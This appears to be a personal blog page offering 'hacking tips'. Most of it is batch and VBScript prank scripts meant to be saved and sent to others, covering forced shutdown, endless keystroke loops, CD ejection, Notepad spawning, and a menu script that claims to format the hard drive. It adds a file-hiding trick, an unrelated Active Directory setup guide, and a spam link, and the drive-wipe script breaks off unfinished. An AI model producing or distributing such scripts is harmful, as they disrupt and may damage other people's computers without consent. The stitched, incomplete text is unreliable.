Tuesday, April 26, 2011

NEW HACKING TIPS

HAI I AM BHUPINDER SINGH KHANGURA. I HAVE SOME INFORAMTION ABOUT NETWORKING & I HAVE SHARE THESE INFORMATION ANYWARE SO READ ME MY CONTENTS OK
SOME STEPS ARE :---
1) Convey a little message and shut down the computer:
Type :

@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s


Save it as "Anything.BAT" in All Files and send it.

2) Toggle the Caps Lock button simultaneously:
Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.

3) Continually pop out the CD Drive. If there are more than one, it pops out all of them!
Type :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.

4) Frustrate someone by making this VBScript hit Enter simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

5) Open Notepad, slowly type "Hello, how are you? I am good thanks" after some time of clicking the file and freak someone out:

Type :

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

6) Frustrate someone by making this VBScript hit Backspace simultaneously:
Type :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

7) Hack the keyboard and make it type "You are a fool" continuously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

8. Open Notepad continually in your friend's computer:
Type :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.

9) Hide text inside your text file !
* Open your command prompt Start–>Run type cmd
* Move to any destination for example let us assume D:\> drive
* Type the below code in your command prompt
* D:\>notepad syshacks.txt:hidden
* syshacks notepad save
* syshacks notepad hidden
* Write some data and save the file.
* Move to D:\> and open syshacks.txt you cannot see no data in the file syshacks.txt.
* To retrieve the hidden data open command prompt and type the same command.
* D:\>notepad syshacks.txt:hidden
* Notepad will open syshacks.txt file with hidden data

Monday, May 26, 2008

MY NETWORKING

How to configure and maintain Active Directory step by step?
When you have installed the windows 2003 server on your computer and the next step is to run the Active Directory setup to create the new Active Directory domain.


Perform the following steps to convert your windows 2003 server into the first domain controller.
There are some pre-requirement for install Domain Controller.
Operating system must be fresh MS-Server 2003.
One partition must be a NTFS partition with enough free space.
Properly configured DNS and TCP/IP settings.
Computer must be connected properly (physically and logically) to other computers.
Windows 2003 server source CD.
Server end Configurations for Active Directory Server.
First click on start button to open Run option and type here "dcpromo" then press Ok button.
Now windows active directory welcome page will appear, click on Next button.
Again click Next button on "Operating System Compatibility" (here you can read some requirement for domain client).
For new domain, select the option "Domain Controller for a New Domain" and click Next button.
On the next "Create New Domain" page, select the "Domain in a new Forest" option and again click Next button.
On next page, give the full DNS name for new domain that should be a fully qualified domain name, for example champion.com and click Next button.



On the NetBIOS Domain Name page, it will show the NetBIOS Name (in this case champion), click Next.

Continue.....

How to configure and maintain Active Directory step by step?
On the next "Database and Log Folders" page, you can change the location of active directory database folder and Log folder also. For best performance, store these folders on separate partition or hard disks. Click Next for default setting.


Now wizard will show you the path of "Shared system Volume folder location", you should not change its default path. Click Next for default setting.
On next page, select, "Install and Configure the DNS Server" and set computer to use this DNS as its preferred DNS server and click Next button.
On permission page, select the option "Permissions compatible only with 2000 or Window sever 2003 operating systems" and again click Next.
On the page "Directory Services Restore Mode Administrator Password" and give "Restore Mode Password", if you want otherwise leave this empty and click Next.



Click Next on Summary page, after this active directory service will be start to install.
After complete the wizard, Restart your computer to save settings.
Previous Page

How to configure and maintain Additional Domain Controller step by step?
You can install additional domain controller, if you already have one main domain controller. Using additional domain controller, you can perform the proper load balancing as well as improve the reliability and availability of network resources.


Perform the following steps to add additional domain controller to your windows 2003 server domain controller.
There are some pre-requirement for install Additional Domain Controller.
Operating system must be MS-Server 2003.
One partition must be a NTFS partition with enough free space.
Domain Controller must be configured
DNS and TCP/IP settings must be configured.
Computer must be connected properly (physically and logically) to other computers.
Server end Configurations for Additional Domain Controller
First click on start button to open Run option and type here "dcpromo" then press Ok button.
Now windows active directory welcome page will appear, click Next button.
Again click Next button on "Operating System Compatibility" (here you can read some requirement for domain client).
For additional domain controller, select the option "Additional Domain Controller for an existing Domain" and click Next button.
Now give the Username, Password and Domain name of the Domain Controller System and click Next.
Now give the domain name as student.champion.com (in this case) on the Additional Domain Controller page and click Next to continue.





On the next "Database and Log Folders" page, you can change the location of active directory database folder and Log folder also. For best performance, store these folders on separate partition or hard disks. Click Next for default setting.
Now wizard will show you the path of "Shared system Volume folder location", you should not change its default path. Click Next for default setting.
On the page "Directory Services Restore Mode Administrator Password" and give "Restore Mode Password", if you want otherwise leave this empty and click Next.
Click Next on Summary page, after this active directory service will be start to install. After complete the wizard, Restart your computer to save settings.

Cheap Auto Insurance Quote

http://www.slide.com/r/8exDcwYZ5T-kSlMtdkS5yom8pvMA2dRN?previous_view=mscd_embedded_url&view=original